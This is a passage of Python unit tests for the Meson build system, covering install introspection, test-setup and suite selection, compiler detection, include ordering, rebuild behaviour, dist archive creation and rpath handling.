= [f for f in after if f.endswith(('.o', '.obj'))] # Static library should contain only one object self.assertEqual(len(after), 1, msg=after) # and the object must have changed self.assertNotEqual(before, after) def test_static_compile_order(self): ''' Test that the order of files in a compiler command-line while compiling and linking statically is deterministic. This can't be an ordinary test case because we need to inspect the compiler database. https://github.com/mesonbuild/meson/pull/951 ''' testdir = os.path.join(self.common_test_dir, '5 linkstatic') self.init(testdir) compdb = self.get_compdb() # Rules will get written out in this order self.assertTrue(compdb[0]['file'].endswith("libfile.c")) self.assertTrue(compdb[1]['file'].endswith("libfile2.c")) self.assertTrue(compdb[2]['file'].endswith("libfile3.c")) self.assertTrue(compdb[3]['file'].endswith("libfile4.c")) # FIXME: We don't have access to the linker command def test_run_target_files_path(self): ''' Test that run_targets are run from the correct directory https://github.com/mesonbuild/meson/issues/957 ''' testdir = os.path.join(self.common_test_dir, '52 run target') self.init(testdir) self.run_target('check_exists') def test_install_introspection(self): ''' Tests that the Meson introspection API exposes install filenames correctly https://github.com/mesonbuild/meson/issues/829 ''' if self.backend is not Backend.ninja: raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name)) testdir = os.path.join(self.common_test_dir, '8 install') self.init(testdir) intro = self.introspect('--targets') if intro[0]['type'] == 'executable': intro = intro[::-1] self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a']) self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix]) def test_install_subdir_introspection(self): ''' Test that the Meson introspection API also contains subdir install information https://github.com/mesonbuild/meson/issues/5556 ''' testdir = os.path.join(self.common_test_dir, '60 install subdir') self.init(testdir) intro = self.introspect('--installed') expected = { 'sub2': 'share/sub2', 'subdir/sub1': 'share/sub1', 'subdir/sub_elided': 'share', 'sub1': 'share/sub1', 'sub/sub1': 'share/sub1', 'sub_elided': 'share', 'nested_elided/sub': 'share', } self.assertEqual(len(intro), len(expected)) # Convert expected to PurePath expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()} intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()} for src, dst in expected_converted.items(): self.assertIn(src, intro_converted) self.assertEqual(dst, intro_converted[src]) def test_install_introspection_multiple_outputs(self): ''' Tests that the Meson introspection API exposes multiple install filenames correctly without crashing https://github.com/mesonbuild/meson/pull/4555 Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438 TODO Change the format to a list officially in a followup PR ''' if self.backend is not Backend.ninja: raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name)) testdir = os.path.join(self.common_test_dir, '141 custom target multiple outputs') self.init(testdir) intro = self.introspect('--targets') if intro[0]['type'] == 'executable': intro = intro[::-1] self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh']) self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh']) self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None]) self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh']) def test_install_log_content(self): ''' Tests that the install-log.txt is consistent with the installed files and directories. Specifically checks that the log file only contains one entry per file/directory. https://github.com/mesonbuild/meson/issues/4499 ''' testdir = os.path.join(self.common_test_dir, '60 install subdir') self.init(testdir) self.install() installpath = Path(self.installdir) # Find installed files and directories expected = {installpath: 0} for name in installpath.rglob('*'): expected[name] = 0 # Find logged files and directories with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f: logged = list(map(lambda l: Path(l.strip()), filter(lambda l: not l.startswith('#'), f.readlines()))) for name in logged: self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name)) expected[name] += 1 for name, count in expected.items(): self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name)) self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name)) def test_uninstall(self): exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix) testdir = os.path.join(self.common_test_dir, '8 install') self.init(testdir) self.assertPathDoesNotExist(exename) self.install() self.assertPathExists(exename) self.uninstall() self.assertPathDoesNotExist(exename) def test_forcefallback(self): testdir = os.path.join(self.unit_test_dir, '31 forcefallback') self.init(testdir, extra_args=['--wrap-mode=forcefallback']) self.build() self.run_tests() def test_force_fallback_for(self): testdir = os.path.join(self.unit_test_dir, '31 forcefallback') self.init(testdir, extra_args=['--force-fallback-for=zlib,foo']) self.build() self.run_tests() def test_env_ops_dont_stack(self): ''' Test that env ops prepend/append do not stack, and that this usage issues a warning ''' testdir = os.path.join(self.unit_test_dir, '63 test env does not stack') out = self.init(testdir) self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND') self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND') self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET') self.run_tests() def test_testsetups(self): if not shutil.which('valgrind'): raise unittest.SkipTest('Valgrind not installed.') testdir = os.path.join(self.unit_test_dir, '2 testsetups') self.init(testdir) self.build() # Run tests without setup self.run_tests() with open(os.path.join(self.logdir, 'testlog.txt')) as f: basic_log = f.read() # Run buggy test with setup that has env that will make it fail self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=valgrind']) with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f: vg_log = f.read() self.assertFalse('TEST_ENV is set' in basic_log) self.assertFalse('Memcheck' in basic_log) self.assertTrue('TEST_ENV is set' in vg_log) self.assertTrue('Memcheck' in vg_log) # Run buggy test with setup without env that will pass self._run(self.mtest_command + ['--setup=wrapper']) # Setup with no properties works self._run(self.mtest_command + ['--setup=empty']) # Setup with only env works self._run(self.mtest_command + ['--setup=onlyenv']) self._run(self.mtest_command + ['--setup=onlyenv2']) self._run(self.mtest_command + ['--setup=onlyenv3']) # Setup with only a timeout works self._run(self.mtest_command + ['--setup=timeout']) def test_testsetup_selection(self): testdir = os.path.join(self.unit_test_dir, '14 testsetup selection') self.init(testdir) self.build() # Run tests without setup self.run_tests() self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo']) self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:']) self._run(self.mtest_command + ['--setup=worksforall']) self._run(self.mtest_command + ['--setup=main:worksforall']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=onlyinbar']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:']) self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:']) self._run(self.mtest_command + ['--setup=bar:onlyinbar']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=foo:onlyinbar']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=main:onlyinbar']) def test_testsetup_default(self): testdir = os.path.join(self.unit_test_dir, '49 testsetup default') self.init(testdir) self.build() # Run tests without --setup will cause the default setup to be used self.run_tests() with open(os.path.join(self.logdir, 'testlog.txt')) as f: default_log = f.read() # Run tests with explicitly using the same setup that is set as default self._run(self.mtest_command + ['--setup=mydefault']) with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f: mydefault_log = f.read() # Run tests with another setup self._run(self.mtest_command + ['--setup=other']) with open(os.path.join(self.logdir, 'testlog-other.txt')) as f: other_log = f.read() self.assertTrue('ENV_A is 1' in default_log) self.assertTrue('ENV_B is 2' in default_log) self.assertTrue('ENV_C is 2' in default_log) self.assertTrue('ENV_A is 1' in mydefault_log) self.assertTrue('ENV_B is 2' in mydefault_log) self.assertTrue('ENV_C is 2' in mydefault_log) self.assertTrue('ENV_A is 1' in other_log) self.assertTrue('ENV_B is 3' in other_log) self.assertTrue('ENV_C is 2' in other_log) def assertFailedTestCount(self, failure_count, command): try: self._run(command) self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count) except subprocess.CalledProcessError as e: self.assertEqual(e.returncode, failure_count) def test_suite_selection(self): testdir = os.path.join(self.unit_test_dir, '4 suite selection') self.init(testdir) self.build() self.assertFailedTestCount(4, self.mtest_command) self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success']) self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success']) self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success']) self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail']) self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj']) self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test']) self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail']) def test_build_by_default(self): testdir = os.path.join(self.common_test_dir, '130 build by default') self.init(testdir) self.build() genfile1 = os.path.join(self.builddir, 'generated1.dat') genfile2 = os.path.join(self.builddir, 'generated2.dat') exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix) exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix) self.assertPathExists(genfile1) self.assertPathExists(genfile2) self.assertPathDoesNotExist(exe1) self.assertPathDoesNotExist(exe2) self.build(target=('fooprog' + exe_suffix)) self.assertPathExists(exe1) self.build(target=('barprog' + exe_suffix)) self.assertPathExists(exe2) def test_internal_include_order(self): if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ): raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2') testdir = os.path.join(self.common_test_dir, '131 include order') self.init(testdir) execmd = fxecmd = None for cmd in self.get_compdb(): if 'someexe' in cmd['command']: execmd = cmd['command'] continue if 'somefxe' in cmd['command']: fxecmd = cmd['command'] continue if not execmd or not fxecmd: raise Exception('Could not find someexe and somfxe commands') # Check include order for 'someexe' incs = [a for a in split_args(execmd) if a.startswith("-I")] self.assertEqual(len(incs), 9) # Need to run the build so the private dir is created. self.build() pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p')) self.assertEqual(len(pdirs), 1) privdir = pdirs[0][len(self.builddir)+1:] self.assertPathEqual(incs[0], "-I" + privdir) # target build subdir self.assertPathEqual(incs[1], "-Isub4") # target source subdir self.assertPathBasenameEqual(incs[2], 'sub4') # include paths added via per-target c_args: ['-I'...] self.assertPathBasenameEqual(incs[3], 'sub3') # target include_directories: build dir self.assertPathEqual(incs[4], "-Isub2") # target include_directories: source dir self.assertPathBasenameEqual(incs[5], 'sub2') # target internal dependency include_directories: build dir self.assertPathEqual(incs[6], "-Isub1") # target internal dependency include_directories: source dir self.assertPathBasenameEqual(incs[7], 'sub1') # custom target include dir self.assertPathEqual(incs[8], '-Ictsub') # Check include order for 'somefxe' incs = [a for a in split_args(fxecmd) if a.startswith('-I')] self.assertEqual(len(incs), 9) # target private dir pdirs = glob(os.path.join(self.builddir, 'somefxe*.p')) self.assertEqual(len(pdirs), 1) privdir = pdirs[0][len(self.builddir)+1:] self.assertPathEqual(incs[0], '-I' + privdir) # target build dir self.assertPathEqual(incs[1], '-I.') # target source dir self.assertPathBasenameEqual(incs[2], os.path.basename(testdir)) # target internal dependency correct include_directories: build dir self.assertPathEqual(incs[3], "-Isub4") # target internal dependency correct include_directories: source dir self.assertPathBasenameEqual(incs[4], 'sub4') # target internal dependency dep include_directories: build dir self.assertPathEqual(incs[5], "-Isub1") # target internal dependency dep include_directories: source dir self.assertPathBasenameEqual(incs[6], 'sub1') # target internal dependency wrong include_directories: build dir self.assertPathEqual(incs[7], "-Isub2") # target internal dependency wrong include_directories: source dir self.assertPathBasenameEqual(incs[8], 'sub2') def test_compiler_detection(self): ''' Test that automatic compiler detection and setting from the environment both work just fine. This is needed because while running project tests and other unit tests, we always read CC/CXX/etc from the environment. ''' gnu = mesonbuild.compilers.GnuCompiler clang = mesonbuild.compilers.ClangCompiler intel = mesonbuild.compilers.IntelGnuLikeCompiler msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler) clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler) ar = mesonbuild.linkers.ArLinker lib = mesonbuild.linkers.VisualStudioLinker langs = [('c', 'CC'), ('cpp', 'CXX')] if not is_windows() and platform.machine().lower() != 'e2k': langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')] testdir = os.path.join(self.unit_test_dir, '5 compiler detection') env = get_fake_env(testdir, self.builddir, self.prefix) for lang, evar in langs: # Detect with evar and do sanity checks on that if evar in os.environ: ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) self.assertTrue(ecc.version) elinker = env.detect_static_linker(ecc) # Pop it so we don't use it for the next detection evalue = os.environ.pop(evar) # Very rough/strict heuristics. Would never work for actual # compiler detection, but should be ok for the tests. ebase = os.path.basename(evalue) if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')): self.assertIsInstance(ecc, gnu) self.assertIsInstance(elinker, ar) elif 'clang-cl' in ebase: self.assertIsInstance(ecc, clangcl) self.assertIsInstance(elinker, lib) elif 'clang' in ebase: self.assertIsInstance(ecc, clang) self.assertIsInstance(elinker, ar) elif ebase.startswith('ic'): self.assertIsInstance(ecc, intel) self.assertIsInstance(elinker, ar) elif ebase.startswith('cl'): self.assertIsInstance(ecc, msvc) self.assertIsInstance(elinker, lib) else: raise AssertionError('Unknown compiler {!r}'.format(evalue)) # Check that we actually used the evalue correctly as the compiler self.assertEqual(ecc.get_exelist(), split_args(evalue)) # Do auto-detection of compiler based on platform, PATH, etc. cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) self.assertTrue(cc.version) linker = env.detect_static_linker(cc) # Check compiler type if isinstance(cc, gnu): self.assertIsInstance(linker, ar) if is_osx(): self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker) elif is_sunos(): self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)) else: self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin) if isinstance(cc, clangcl): self.assertIsInstance(linker, lib) self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker) if isinstance(cc, clang): self.assertIsInstance(linker, ar) if is_osx(): self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker) elif is_windows(): # This is clang, not clang-cl self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker) else: self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin) if isinstance(cc, intel): self.assertIsInstance(linker, ar) if is_osx(): self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker) elif is_windows(): self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker) else: self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker) if isinstance(cc, msvc): self.assertTrue(is_windows()) self.assertIsInstance(linker, lib) self.assertEqual(cc.id, 'msvc') self.assertTrue(hasattr(cc, 'is_64')) self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker) # If we're on Windows CI, we know what the compiler will be if 'arch' in os.environ: if os.environ['arch'] == 'x64': self.assertTrue(cc.is_64) else: self.assertFalse(cc.is_64) # Set evar ourselves to a wrapper script that just calls the same # exelist + some argument. This is meant to test that setting # something like `ccache gcc -pipe` or `distcc ccache gcc` works. wrapper = os.path.join(testdir, 'compiler wrapper.py') wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG'] wrappercc_s = '' for w in wrappercc: wrappercc_s += quote_arg(w) + ' ' os.environ[evar] = wrappercc_s wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) # Check static linker too wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args() wrapperlinker_s = '' for w in wrapperlinker: wrapperlinker_s += quote_arg(w) + ' ' os.environ['AR'] = wrapperlinker_s wlinker = env.detect_static_linker(wcc) # Pop it so we don't use it for the next detection evalue = os.environ.pop('AR') # Must be the same type since it's a wrapper around the same exelist self.assertIs(type(cc), type(wcc)) self.assertIs(type(linker), type(wlinker)) # Ensure that the exelist is correct self.assertEqual(wcc.get_exelist(), wrappercc) self.assertEqual(wlinker.get_exelist(), wrapperlinker) # Ensure that the version detection worked correctly self.assertEqual(cc.version, wcc.version) if hasattr(cc, 'is_64'): self.assertEqual(cc.is_64, wcc.is_64) def test_always_prefer_c_compiler_for_asm(self): testdir = os.path.join(self.common_test_dir, '134 c cpp and asm') # Skip if building with MSVC env = get_fake_env(testdir, self.builddir, self.prefix) if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc': raise unittest.SkipTest('MSVC can\'t compile assembly') self.init(testdir) commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}} for cmd in self.get_compdb(): # Get compiler split = split_args(cmd['command']) if split[0] == 'ccache': compiler = split[1] else: compiler = split[0] # Classify commands if 'Ic-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['c-asm']['asm'] = compiler elif cmd['file'].endswith('.c'): commands['c-asm']['c'] = compiler else: raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command'])) elif 'Icpp-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['cpp-asm']['asm'] = compiler elif cmd['file'].endswith('.cpp'): commands['cpp-asm']['cpp'] = compiler else: raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command'])) elif 'Ic-cpp-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['c-cpp-asm']['asm'] = compiler elif cmd['file'].endswith('.c'): commands['c-cpp-asm']['c'] = compiler elif cmd['file'].endswith('.cpp'): commands['c-cpp-asm']['cpp'] = compiler else: raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command'])) elif 'Icpp-c-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['cpp-c-asm']['asm'] = compiler elif cmd['file'].endswith('.c'): commands['cpp-c-asm']['c'] = compiler elif cmd['file'].endswith('.cpp'): commands['cpp-c-asm']['cpp'] = compiler else: raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command'])) else: raise AssertionError('Unknown command {!r} found'.format(cmd['command'])) # Check that .S files are always built with the C compiler self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c']) self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm']) self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c']) self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c']) self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c']) self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp']) self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp']) self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp']) # Check that the c-asm target is always linked with the C linker build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() m = re.search('build c-asm.*: c_LINKER', contents) self.assertIsNotNone(m, msg=contents) def test_preprocessor_checks_CPPFLAGS(self): ''' Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but not LDFLAGS. ''' testdir = os.path.join(self.common_test_dir, '133 get define') define = 'MESON_TEST_DEFINE_VALUE' # NOTE: this list can't have \n, ' or " # \n is never substituted by the GNU pre-processor via a -D define # ' and " confuse split_args() even when they are escaped # % and # confuse the MSVC preprocessor # !, ^, *, and < confuse lcc preprocessor value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`' for env_var in ['CPPFLAGS', 'CFLAGS']: env = {} env[env_var] = '-D{}="{}"'.format(define, value) env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define) self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env) def test_custom_target_exe_data_deterministic(self): testdir = os.path.join(self.common_test_dir, '110 custom target capture') self.init(testdir) meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat')) self.wipe() self.init(testdir) meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat')) self.assertListEqual(meson_exe_dat1, meson_exe_dat2) def test_noop_changes_cause_no_rebuilds(self): ''' Test that no-op changes to the build files such as mtime do not cause a rebuild of anything. ''' testdir = os.path.join(self.common_test_dir, '6 linkshared') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of meson.build should not rebuild anything self.utime(os.path.join(testdir, 'meson.build')) self.assertReconfiguredBuildIsNoop() # Changing mtime of libefile.c should rebuild the library, but not relink the executable self.utime(os.path.join(testdir, 'libfile.c')) self.assertBuildRelinkedOnlyTarget('mylib') def test_source_changes_cause_rebuild(self): ''' Test that changes to sources and headers cause rebuilds, but not changes to unused files (as determined by the dependency file) in the input files list. ''' testdir = os.path.join(self.common_test_dir, '20 header in file list') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of header.h should rebuild everything self.utime(os.path.join(testdir, 'header.h')) self.assertBuildRelinkedOnlyTarget('prog') def test_custom_target_changes_cause_rebuild(self): ''' Test that in a custom target, changes to the input files, the ExternalProgram, and any File objects on the command-line cause a rebuild. ''' testdir = os.path.join(self.common_test_dir, '58 custom header generator') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of these should rebuild everything for f in ('input.def', 'makeheader.py', 'somefile.txt'): self.utime(os.path.join(testdir, f)) self.assertBuildRelinkedOnlyTarget('prog') def test_source_generator_program_cause_rebuild(self): ''' Test that changes to generator programs in the source tree cause a rebuild. ''' testdir = os.path.join(self.common_test_dir, '91 gen extra') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of generator should rebuild the executable self.utime(os.path.join(testdir, 'srcgen.py')) self.assertRebuiltTarget('basic') def test_static_library_lto(self): ''' Test that static libraries can be built with LTO and linked to executables. On Linux, this requires the use of gcc-ar. https://github.com/mesonbuild/meson/issues/1646 ''' testdir = os.path.join(self.common_test_dir, '5 linkstatic') env = get_fake_env(testdir, self.builddir, self.prefix) if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows(): raise unittest.SkipTest('LTO not (yet) supported by windows clang') self.init(testdir, extra_args='-Db_lto=true') self.build() self.run_tests() def test_dist_git(self): if not shutil.which('git'): raise unittest.SkipTest('Git not found') if self.backend is not Backend.ninja: raise unittest.SkipTest('Dist is only supported with Ninja') try: self.dist_impl(_git_init) except PermissionError: # When run under Windows CI, something (virus scanner?) # holds on to the git files so cleaning up the dir # fails sometimes. pass def has_working_hg(self): if not shutil.which('hg'): return False try: # This check should not be necessary, but # CI under macOS passes the above test even # though Mercurial is not installed. if subprocess.call(['hg', '--version'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) != 0: return False return True except FileNotFoundError: return False def test_dist_hg(self): if not self.has_working_hg(): raise unittest.SkipTest('Mercurial not found or broken.') if self.backend is not Backend.ninja: raise unittest.SkipTest('Dist is only supported with Ninja') def hg_init(project_dir): subprocess.check_call(['hg', 'init'], cwd=project_dir) with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f: print('[ui]', file=f) print('username=Author Person <teh_coderz@example.com>', file=f) subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir) subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir) try: self.dist_impl(hg_init, include_subprojects=False) except PermissionError: # When run under Windows CI, something (virus scanner?) # holds on to the hg files so cleaning up the dir # fails sometimes. pass def test_dist_git_script(self): if not shutil.which('git'): raise unittest.SkipTest('Git not found') if self.backend is not Backend.ninja: raise unittest.SkipTest('Dist is only supported with Ninja') try: with tempfile.TemporaryDirectory() as tmpdir: project_dir = os.path.join(tmpdir, 'a') shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'), project_dir) _git_init(project_dir) self.init(project_dir) self.build('dist') except PermissionError: # When run under Windows CI, something (virus scanner?) # holds on to the git files so cleaning up the dir # fails sometimes. pass def create_dummy_subproject(self, project_dir, name): path = os.path.join(project_dir, 'subprojects', name) os.makedirs(path) with open(os.path.join(path, 'meson.build'), 'w') as ofile: ofile.write("project('{}')".format(name)) return path def dist_impl(self, vcs_init, include_subprojects=True): # Create this on the fly because having rogue .git directories inside # the source tree leads to all kinds of trouble. with tempfile.TemporaryDirectory() as project_dir: with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile: ofile.write(textwrap.dedent('''\ project('disttest', 'c', version : '1.4.3') e = executable('distexe', 'distexe.c') test('dist test', e) subproject('vcssub', required : false) subproject('tarballsub', required : false) ''')) with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile: ofile.write(textwrap.dedent('''\ #include<stdio.h> int main(int argc, char **argv) { printf("I am a distribution test.\\n"); return 0; } ''')) xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz') xz_checksumfile = xz_distfile + '.sha256sum' zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip') zip_checksumfile = zip_distfile + '.sha256sum' vcs_init(project_dir) if include_subprojects: vcs_init(self.create_dummy_subproject(project_dir, 'vcssub')) self.create_dummy_subproject(project_dir, 'tarballsub') self.create_dummy_subproject(project_dir, 'unusedsub') self.init(project_dir) self.build('dist') self.assertPathExists(xz_distfile) self.assertPathExists(xz_checksumfile) self.assertPathDoesNotExist(zip_distfile) self.assertPathDoesNotExist(zip_checksumfile) self._run(self.meson_command + ['dist', '--formats', 'zip'], workdir=self.builddir) self.assertPathExists(zip_distfile) self.assertPathExists(zip_checksumfile) if include_subprojects: z = zipfile.ZipFile(zip_distfile) self.assertEqual(sorted(['disttest-1.4.3/', 'disttest-1.4.3/meson.build', 'disttest-1.4.3/distexe.c']), sorted(z.namelist())) self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'], workdir=self.builddir) z = zipfile.ZipFile(zip_distfile) self.assertEqual(sorted(['disttest-1.4.3/', 'disttest-1.4.3/subprojects/', 'disttest-1.4.3/meson.build', 'disttest-1.4.3/distexe.c', 'disttest-1.4.3/subprojects/tarballsub/', 'disttest-1.4.3/subprojects/vcssub/', 'disttest-1.4.3/subprojects/tarballsub/meson.build', 'disttest-1.4.3/subprojects/vcssub/meson.build']), sorted(z.namelist())) def test_rpath_uses_ORIGIN(self): ''' Test that built targets use $ORIGIN in rpath, which ensures that they are relocatable and ensures that builds are reproducible since the build directory won't get embedded into the built binaries. ''' if is_windows() or is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') testdir = os.path.join(self.common_test_dir, '40 library chain') self.init(testdir) self.build() for each in ('prog', 'subdir/liblib1.so', ): rpath = get_rpath(os.path.join(self.builddir, each)) self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each)) if is_dragonflybsd(): # DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath, # so ignore that. self.assertTrue(rpath.startswith('/usr/lib/gcc')) rpaths = rpath.split(':')[1:] else: rpaths = rpath.split(':') for path in rpaths: self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path)) # These two don't link to anything else, so they do not need an rpath entry. for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'): rpath = get_rpath(os.path.join(self.builddir, each)) if is_dragonflybsd(): # The rpath should be equal to 